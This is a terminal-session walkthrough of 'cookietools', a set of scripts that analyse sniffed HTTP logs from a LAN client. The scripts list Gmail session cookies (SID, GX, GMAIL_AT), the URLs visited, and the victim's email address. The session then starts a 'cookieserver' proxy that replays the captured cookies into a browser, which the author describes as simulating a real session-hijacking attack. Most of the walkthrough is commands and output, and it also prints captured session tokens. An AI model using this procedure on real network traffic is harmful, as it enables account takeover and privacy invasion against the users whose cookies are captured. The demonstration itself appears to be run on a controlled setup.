xenion@gollum:~/dev/cookietools$ bin/analyzers/names.sh logz/
======================== Client 192.168.1.2 ========================

----- Cookies under google.com -----
GMAIL_AT
GMAIL_IMP
GMAIL_LOGIN
GMAIL_RTT
GMAIL_STAT
GMAIL_STAT_PENDING
GX
PREF
S
SID
TZ
__utma
__utmb
__utmc
__utmx
__utmz
gmailchat

xenion@gollum:~/dev/cookietools$

How often does each of their values occur?

xenion@gollum:~/dev/cookietools$ bin/analyzers/occurrences.sh logz/     
======================== Client 192.168.1.2 ========================

----- GMAIL_AT -----
    151 GMAIL_AT=xn3j2xo9rptl0x2dpylih9ot3o84x5;

----- GMAIL_IMP -----
      7 GMAIL_IMP=EXPIRED;
      1 GMAIL_IMP=bf-i%2Fd-1280-718%2Ffn-n;
      1 GMAIL_IMP=fn-n%2Ftl-v%2Ftl-f%2Fcv-v%2Fcv-pfn-0%2Fcv-p%2Ffn-n%2Ftl-v%2Ftl-f%2Ftl-v;
      4 GMAIL_IMP=fn-n;
      1 GMAIL_IMP=tl-v%2Ftl-f%2Ftl-v;
      4 GMAIL_IMP=tl-v;

----- GMAIL_LOGIN -----
    150 GMAIL_LOGIN=T1196434986128/1196434986128/1196434991464;

----- GMAIL_RTT -----
    154 GMAIL_RTT=203;

----- GMAIL_STAT -----
      1 GMAIL_STAT=/S:a=i&sv=&ev=tl&s=339&t=6946&w=838&;
      1 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&/S:a=o&sv=tl&ev=cv&s=&t=293&w=&/S:a=lc&sv=cv&ev=tl&s=&t=309&w=&;
      1 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=18&t=1601&w=538&/S:a=lc&sv=tl&ev=tl&s=&t=352&w=&;
      1 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=19&t=1717&w=887&;
      3 GMAIL_STAT=/S:a=lc&sv=tl&ev=tl&s=35&t=1066&w=533&;
      5 GMAIL_STAT=EXPIRED;

----- GMAIL_STAT_PENDING -----
      1 GMAIL_STAT_PENDING=/S:a=i&sv=&ev=tl&s=339&t=6946&w=838&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1394&w=521&;
      2 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&/S:a=o&sv=tl&ev=cv&s=&t=293&w=&/S:a=lc&sv=cv&ev=tl&s=&t=309&w=&;
     15 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&/S:a=o&sv=tl&ev=cv&s=&t=293&w=&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&/S:a=lc&sv=tl&ev=tl&s=&t=460&w=&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=13&t=1869&w=676&;
      1 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=18&t=1601&w=538&/S:a=lc&sv=tl&ev=tl&s=&t=352&w=&;
      5 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=19&t=1717&w=887&;
      6 GMAIL_STAT_PENDING=/S:a=lc&sv=tl&ev=tl&s=35&t=1066&w=533&;

----- GX -----
    151 GX=DQAAAG4AAADY6wZGiHdqH9flBuHSLJKHnUhZ6yeWAfnu-DibzNPedKvzrX65AGLN4gX7GUzWVDHUvRtia8U1d1iUTQDhEHJAuWw0H6zMM9cUu7GCJwo0xO9ti4h5ibJn3BY4cbpz9JaMORDyTMYPjNKExV3dZLo5;

----- N_T -----
      1 N_T=sess=5c47c2c1a80020e8&v=2&c=16388f3b&s=47502708&t=s:0:switchguide.html&sessref=;

----- PREF -----
    103 PREF=ID=38f52b118d41bca7:TM=1196435005:LM=1196435005:GM=1:S=MvwiRzegb4sU8QoM;

----- S -----
      1 S=gmail=pq4CRx_S_nhiN8Ty54kudg:gmail_yj=TmJzBxi_hhMAY7vQw4WYcA:gmproxy=qoxcaKJm38E:gmproxy_yj=s9jz8xbDNjY:gmproxy_yj_sub=04oV4_9l-aI;
    151 S=gmail=qceQSU5gZHnCMXxJU7dpGQ:gmail_yj=iZRj9Zr6FCLmONTwzQVOfQ:gmproxy=kw6RnIqPqPk:gmproxy_yj=xV-JZ7AkzZI:gmproxy_yj_sub=qNUhkKVM8SQ;

----- SID -----
    120 SID=DQAAAG4AAADHd05wGtOwIVsWGKHSt2zo_caJx3tnkV79W_hFfOPyAGZWGeztvy52-jR9BdSKchm2XlsNDUVEfAY3Dhod3auXUlilIvnTy_rDIPTbg5ZMHS08IWPEcGHwd6VfiBV7IYwr0j3r2uJoA30wbOzulUKP;

----- TZ -----
    154 TZ=-60;

----- __utma -----
    154 __utma=173272373.1028249202.1196434987.1196434987.1196434987.1;

----- __utmb -----
    154 __utmb=173272373;

----- __utmc -----
    154 __utmc=173272373;

----- __utmx -----
    154 __utmx=173272373.00000785162142287121:1:0-0-1-0-0-0;

----- __utmz -----
    154 __utmz=173272373.1196434987.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);

----- gmailchat -----
    150 gmailchat=charlieroot69@gmail.com/769423;

xenion@gollum:~/dev/cookietools$

Which links were visited? (many are fetched indirectly via javascript)

xenion@gollum:~/dev/cookietools$ bin/analyzers/links.sh logz/
======================== Client 192.168.1.2 ========================

----- Cookie hosts -----
google.com

----- Links -----
http://mail.google.com/mail/
http://mail.google.com/mail/?view=page&name=browser&ver=rladol3zq8xq
http://mail.google.com/mail/?ui=2&view=jsm&name=bjs&ids=16filwhcvscm8%2C13rprcb29qq2s&l=0
http://mail.google.com/mail/?ui=2&view=ss&ver=14ewxrjd6qumb
http://mail.google.com/mail/?ui=2&view=jsm&name=js&ids=l6215xh4rush%2C1qghp2pit7d3o%2C1gjpjcdlnnvrf%2Cxef1uw092kr9%2Cehspxdexmsdf%2C1j1bm9zyki3nm%2Cgvvmdl1m5azm%2Cpd1tigi3ijf3%2Cns2uitrnb4em%2C1pggb3m6xpyk%2Cjqp8z34i4bcs%2C8vml80v56hdp%2C10gzi33nu1at6%2C7h7d36vi93o1%2C1k1v2aui3j8q9&l=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cbj
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&init=1&rt=h&search=inbox
http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=l45rs9a37xgdzta72mf4vl6btvla346
http://mail.google.com/mail/?ui=2&view=jsm&name=cv&ids=3gzy7oqkgypo
http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
http://www.google.com/setgmail?zx=vh7ug1-cwwdqw
http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
http://mail.google.com/mail/?ui=2&view=jsm&name=ch&ids=ulcv9njsj1gu
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&usus=1&rt=j&search=inbox
http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=90&MODE=init&zx=v6bapv-361emi&t=1
http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=140&zx=w87cfw-ysbz8h
http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=40&TYPE=xmlhttp&zx=pgsaxf-hleg5w&t=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=e4pvv0ppwmmfjgepkgk5e51s1636ati
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1412&RID=28319&CVER=3&zx=vab4un-tq15mu&t=1
http://mail.google.com/mail/?ui=2&view=jsm&name=cm&ids=dz7eovo1xhaj
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2182&SID=96A8691006BBAC24&RID=28320&zx=qb2ff0-u2p57r&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2175&RID=rpc&SID=96A8691006BBAC24&CI=0&AID=8&TYPE=xmlhttp&zx=ulbq1b-tnwiv4&t=1
http://mail.google.com/mail/?ui=2&view=jsm&name=e&ids=1ngmlz0gj674u
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cw&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cm&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=187&SID=96A8691006BBAC24&RID=28321&zx=qm8vej-gct1wq&t=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=all
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=spam
http://mail.google.com/mail/rc?a=af&c=cccccc&w=4&h=4
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&th=1162b4bdf27ec66b&search=inbox
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1510&SID=96A8691006BBAC24&RID=28322&zx=ph8xes-yj2vnf&t=1
http://mail.google.com/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en
http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=1884795117&utmcs=UTF-8&utmsr=1280x1024&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=9.0%20r48&utmcn=1&utmhn=mail.google.com&utmr=-&utmp=/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en&utmac=UA-18500-28&utmcc=__utma%3D29003808.1884795117.1196435209.1196435209.1196435209.1%3B%2B__utmb%3D29003808%3B%2B__utmc%3D29003808%3B%2B__utmz%3D29003808.1196435209.1.1.utmcsr%3Dwel%7Cutmccn%3Den%7Cutmcmd%3Dwel%3B%2B
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=12755&SID=96A8691006BBAC24&RID=28323&zx=slua37-twqo4w&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=20444&SID=96A8691006BBAC24&RID=28324&zx=m3s1vh-bc9ie0&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=323&SID=96A8691006BBAC24&RID=28325&zx=y44mnn-kcqmx2&t=1
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=4&SID=96A8691006BBAC24&RID=28326&zx=zab2pw-d61rfe&t=1
http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=sent
http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=317&SID=96A8691006BBAC24&RID=28327&zx=jfh2v0-zhb58w&t=1

xenion@gollum:~/dev/cookietools$

Let's look at a summary "snapshot":

xenion@gollum:~/dev/cookietools$ bin/analyzers/vision.sh logz/
======================== Client 192.168.1.2 ========================

----- Links -----
link[192.168.1.2] http://mail.google.com/mail/
link[192.168.1.2] http://mail.google.com/mail/?view=page&name=browser&ver=rladol3zq8xq
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=bjs&ids=16filwhcvscm8%2C13rprcb29qq2s&l=0
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=ss&ver=14ewxrjd6qumb
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=js&ids=l6215xh4rush%2C1qghp2pit7d3o%2C1gjpjcdlnnvrf%2Cxef1uw092kr9%2Cehspxdexmsdf%2C1j1bm9zyki3nm%2Cgvvmdl1m5azm%2Cpd1tigi3ijf3%2Cns2uitrnb4em%2C1pggb3m6xpyk%2Cjqp8z34i4bcs%2C8vml80v56hdp%2C10gzi33nu1at6%2C7h7d36vi93o1%2C1k1v2aui3j8q9&l=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cbj
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&init=1&rt=h&search=inbox
link[192.168.1.2] http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
link[192.168.1.2] http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=l45rs9a37xgdzta72mf4vl6btvla346
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cv&ids=3gzy7oqkgypo
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
link[192.168.1.2] http://www.google.com/setgmail?zx=vh7ug1-cwwdqw
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=ch&ids=ulcv9njsj1gu
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&usus=1&rt=j&search=inbox
link[192.168.1.2] http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=90&MODE=init&zx=v6bapv-361emi&t=1
link[192.168.1.2] http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=140&zx=w87cfw-ysbz8h
link[192.168.1.2] http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=40&TYPE=xmlhttp&zx=pgsaxf-hleg5w&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=e4pvv0ppwmmfjgepkgk5e51s1636ati
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1412&RID=28319&CVER=3&zx=vab4un-tq15mu&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=cm&ids=dz7eovo1xhaj
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2182&SID=96A8691006BBAC24&RID=28320&zx=qb2ff0-u2p57r&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2175&RID=rpc&SID=96A8691006BBAC24&CI=0&AID=8&TYPE=xmlhttp&zx=ulbq1b-tnwiv4&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&view=jsm&name=e&ids=1ngmlz0gj674u
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cw&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cm&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=187&SID=96A8691006BBAC24&RID=28321&zx=qm8vej-gct1wq&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=all
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=spam
link[192.168.1.2] http://mail.google.com/mail/rc?a=af&c=cccccc&w=4&h=4
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&th=1162b4bdf27ec66b&search=inbox
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1510&SID=96A8691006BBAC24&RID=28322&zx=ph8xes-yj2vnf&t=1
link[192.168.1.2] http://mail.google.com/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en
link[192.168.1.2] http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=1884795117&utmcs=UTF-8&utmsr=1280x1024&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=9.0%20r48&utmcn=1&utmhn=mail.google.com&utmr=-&utmp=/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en&utmac=UA-18500-28&utmcc=__utma%3D29003808.1884795117.1196435209.1196435209.1196435209.1%3B%2B__utmb%3D29003808%3B%2B__utmc%3D29003808%3B%2B__utmz%3D29003808.1196435209.1.1.utmcsr%3Dwel%7Cutmccn%3Den%7Cutmcmd%3Dwel%3B%2B
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=12755&SID=96A8691006BBAC24&RID=28323&zx=slua37-twqo4w&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=20444&SID=96A8691006BBAC24&RID=28324&zx=m3s1vh-bc9ie0&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=323&SID=96A8691006BBAC24&RID=28325&zx=y44mnn-kcqmx2&t=1
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=4&SID=96A8691006BBAC24&RID=28326&zx=zab2pw-d61rfe&t=1
link[192.168.1.2] http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=sent
link[192.168.1.2] http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=317&SID=96A8691006BBAC24&RID=28327&zx=jfh2v0-zhb58w&t=1

----- Cookies -----
hosts[192.168.1.2:] google.com 

names[192.168.1.2:google.com] GMAIL_AT GMAIL_IMP GMAIL_LOGIN GMAIL_RTT GMAIL_STAT GMAIL_STAT_PENDING GX PREF S SID TZ __utma __utmb __utmc __utmx __utmz gmailchat 
values[192.168.1.2:google.com] 'GMAIL_AT'='xn3j2xo9rptl0x2dpylih9ot3o84x5'
values[192.168.1.2:google.com] 'GMAIL_IMP'='fn-n%2Ftl-v%2Ftl-f%2Fcv-v%2Fcv-pfn-0%2Fcv-p%2Ffn-n%2Ftl-v%2Ftl-f%2Ftl-v'
values[192.168.1.2:google.com] 'GMAIL_LOGIN'='T1196434986128/1196434986128/1196434991464'
values[192.168.1.2:google.com] 'GMAIL_RTT'='203'
values[192.168.1.2:google.com] 'GMAIL_STAT'='/S:a'
values[192.168.1.2:google.com] 'GMAIL_STAT_PENDING'='/S:a'
values[192.168.1.2:google.com] 'GX'='DQAAAG4AAADY6wZGiHdqH9flBuHSLJKHnUhZ6yeWAfnu-DibzNPedKvzrX65AGLN4gX7GUzWVDHUvRtia8U1d1iUTQDhEHJAuWw0H6zMM9cUu7GCJwo0xO9ti4h5ibJn3BY4cbpz9JaMORDyTMYPjNKExV3dZLo5'
values[192.168.1.2:google.com] 'PREF'='ID'
values[192.168.1.2:google.com] 'S'='gmail'
values[192.168.1.2:google.com] 'SID'='DQAAAG4AAADHd05wGtOwIVsWGKHSt2zo_caJx3tnkV79W_hFfOPyAGZWGeztvy52-jR9BdSKchm2XlsNDUVEfAY3Dhod3auXUlilIvnTy_rDIPTbg5ZMHS08IWPEcGHwd6VfiBV7IYwr0j3r2uJoA30wbOzulUKP'
values[192.168.1.2:google.com] 'TZ'='-60'
values[192.168.1.2:google.com] '__utma'='173272373.1028249202.1196434987.1196434987.1196434987.1'
values[192.168.1.2:google.com] '__utmb'='173272373'
values[192.168.1.2:google.com] '__utmc'='173272373'
values[192.168.1.2:google.com] '__utmx'='173272373.00000785162142287121:1:0-0-1-0-0-0'
values[192.168.1.2:google.com] '__utmz'='173272373.1196434987.1.1.utmccn'
values[192.168.1.2:google.com] 'gmailchat'='charlieroot69@gmail.com/769423'

xenion@gollum:~/dev/cookietools$

Note that with the 'gmailchat' cookie we can quickly identify who is using Gmail:

xenion@gollum:~/dev/cookietools$ bin/analyzers/occurrences.sh logz/ | grep gmailchat=
    150 gmailchat=charlieroot69@gmail.com/769423;
xenion@gollum:~/dev/cookietools$

Now we delete all cookies with domain "google.com" and "google.it" from the browser (in Firefox: Edit -> Preferences -> Privacy -> Cookies -> Show Cookies -> ...) and use cookieserver to load them back, thus simulating a real attack. In this case we can use static mode, because the situation is under our control:

xenion@gollum:~/dev/cookietools$ bin/cookieserver/startup.sh logz/ 192.168.1.2 static
checking for: socat sed grep egrep cut cat head sort tail uniq 
checking log directory...
Client: '192.168.1.2' Logdir: 'logz/'
Cookie Server: 127.0.0.1:8181
tmp files will be generated only once (faster but static)
Building tmp files... (logdir: 'logz/' client: '192.168.1.2')
Listening...

We set the browser's HTTP proxy to 127.0.0.1:8181 and visit the link 'http://any', obtaining this page:

CookieServer

Logdir: 'logz/'

Client: '192.168.1.2'

Faking host: any

Cookie hosts (1):

    * google.com

Links (47):

    * http://mail.google.com/mail/
    * http://mail.google.com/mail/?view=page&name=browser&ver=rladol3zq8xq
    * http://mail.google.com/mail/?ui=2&view=jsm&name=bjs&ids=16filwhcvscm8%2C13rprcb29qq2s&l=0
    * http://mail.google.com/mail/?ui=2&view=ss&ver=14ewxrjd6qumb
    * http://mail.google.com/mail/?ui=2&view=jsm&name=js&ids=l6215xh4rush%2C1qghp2pit7d3o%2C1gjpjcdlnnvrf%2Cxef1uw092kr9%2Cehspxdexmsdf%2C1j1bm9zyki3nm%2Cgvvmdl1m5azm%2Cpd1tigi3ijf3%2Cns2uitrnb4em%2C1pggb3m6xpyk%2Cjqp8z34i4bcs%2C8vml80v56hdp%2C10gzi33nu1at6%2C7h7d36vi93o1%2C1k1v2aui3j8q9&l=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cbj
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&init=1&rt=h&search=inbox
    * http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
    * http://mail.google.com/mail/rc?a=af&c=fff1a8&w=4&h=4
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=l45rs9a37xgdzta72mf4vl6btvla346
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cv&ids=3gzy7oqkgypo
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
    * http://www.google.com/setgmail?zx=vh7ug1-cwwdqw
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cw&ids=1dcbfpf7obz4a
    * http://mail.google.com/mail/?ui=2&view=jsm&name=ch&ids=ulcv9njsj1gu
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&usus=1&rt=j&search=inbox
    * http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=90&MODE=init&zx=v6bapv-361emi&t=1
    * http://chatenabled.mail.google.com/mail/images/cleardot.gif?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=140&zx=w87cfw-ysbz8h
    * http://mail.google.com/mail/channel/test?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=40&TYPE=xmlhttp&zx=pgsaxf-hleg5w&t=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=inbox
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&ak=e4pvv0ppwmmfjgepkgk5e51s1636ati
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1412&RID=28319&CVER=3&zx=vab4un-tq15mu&t=1
    * http://mail.google.com/mail/?ui=2&view=jsm&name=cm&ids=dz7eovo1xhaj
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2182&SID=96A8691006BBAC24&RID=28320&zx=qb2ff0-u2p57r&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=2175&RID=rpc&SID=96A8691006BBAC24&CI=0&AID=8&TYPE=xmlhttp&zx=ulbq1b-tnwiv4&t=1
    * http://mail.google.com/mail/?ui=2&view=jsm&name=e&ids=1ngmlz0gj674u
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=au&rt=j
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cw&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cm&fs=1&tf=1&ver=4pcijug8lfzsh3spvl71c9kfl
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=187&SID=96A8691006BBAC24&RID=28321&zx=qm8vej-gct1wq&t=1
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=all
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=cv&th=1162b4bdf27ec66b&prf=1&rt=j&search=all
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=tl&start=0&num=70&rt=h&search=spam
    * http://mail.google.com/mail/rc?a=af&c=cccccc&w=4&h=4
    * http://mail.google.com/mail/?ui=2&ik=a70d6eca1f&view=ad&th=1162b4bdf27ec66b&search=inbox
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=1510&SID=96A8691006BBAC24&RID=28322&zx=ph8xes-yj2vnf&t=1
    * http://mail.google.com/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en
    * http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=1884795117&utmcs=UTF-8&utmsr=1280x1024&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=9.0%20r48&utmcn=1&utmhn=mail.google.com&utmr=-&utmp=/support/bin/static.py?page=switchguide.html&switch=1&hl=en&utm_source=wel&utm_medium=wel&utm_campaign=en&utmac=UA-18500-28&utmcc=__utma%3D29003808.1884795117.1196435209.1196435209.1196435209.1%3B%2B__utmb%3D29003808%3B%2B__utmc%3D29003808%3B%2B__utmz%3D29003808.1196435209.1.1.utmcsr%3Dwel%7Cutmccn%3Den%7Cutmcmd%3Dwel%3B%2B
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=12755&SID=96A8691006BBAC24&RID=28323&zx=slua37-twqo4w&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=20444&SID=96A8691006BBAC24&RID=28324&zx=m3s1vh-bc9ie0&t=1
    * http://mail.google.com/mail/channel/bind?at=xn3j2xo9rptl0x2dpylih9ot3o84x5&VER=5&it=323&SID=96A8691006BBAC24&RID=28325&zx=y44mnn-kcqmx2&t=1
